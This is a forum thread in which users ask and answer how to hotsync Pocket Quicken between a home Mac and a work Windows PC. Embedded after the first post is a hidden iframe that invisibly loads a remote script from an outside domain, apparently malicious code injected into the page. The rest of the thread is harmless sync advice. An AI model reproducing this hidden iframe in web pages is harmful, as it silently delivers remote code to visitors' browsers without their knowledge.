    Pocket Quicken for Macintosh

    Pocket Quicken 2.0

I have a Mac at home and a Windows 2000 machine at work.

    1. Is it possible to sync with two different machines

    2. Does anyone use this program on the Mac now and what version of Quicken do you have.

I love the idea of having my finances with me all the time. Of couse when my wife asks me "if we have enough in the account for that new smartphone" i won't be able to plead ignorant :anger

Your input is appreciated on Question #1 even if you don't have Pocket Quicken.

    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It is possible to sync with two machines. I do it at work and home all the time with Calendar, Scheduler, WordSmith, etc. Just be careful that you only update on place at a time. i.e. Don't make an appointment in your work computer AND your home computer AND THEN try to sync them both with your PDA. You'll get two appointments. But if you do it once, sync to PDA, then sync to the other computer, you'll have only one appointment.

But I do not use PocketQuicken at all, so I can't really comment on the other one. I suspect it should be doable.

    Nomad--

I sync with Outlook at work and don't have Outlook at home.

In theory, I should be able to change my hotsync settings to do nothing for mail, calendar etc. except for Pocket Quicken?

I have a Mac (OS 9.1) at home, and routinely hotsync Pocket Quicken to my Quicken 2002 there. I have Palm Desktop 4.1 and Pocket Quicken works great.

At work, I have a Windows PC with Windows XP on it. Sometimes I hotsync my 6035 there to install ringers and stuff that I can't do on my Mac at home, and to have as an extra backup. It does NOT have Quicken on it, nor does it have the Pocket Quicken conduit. It will back up the files without syncing them to anything, though.

My Windows PC at work is the PC that I would consider my primary computer. I sync with Outlook and bring in all my contacts etc.

Do you have "do nothing" selected for everything when you sync to your mac.

I've never gone between two computers so your help would be appreciated.

    Thanks
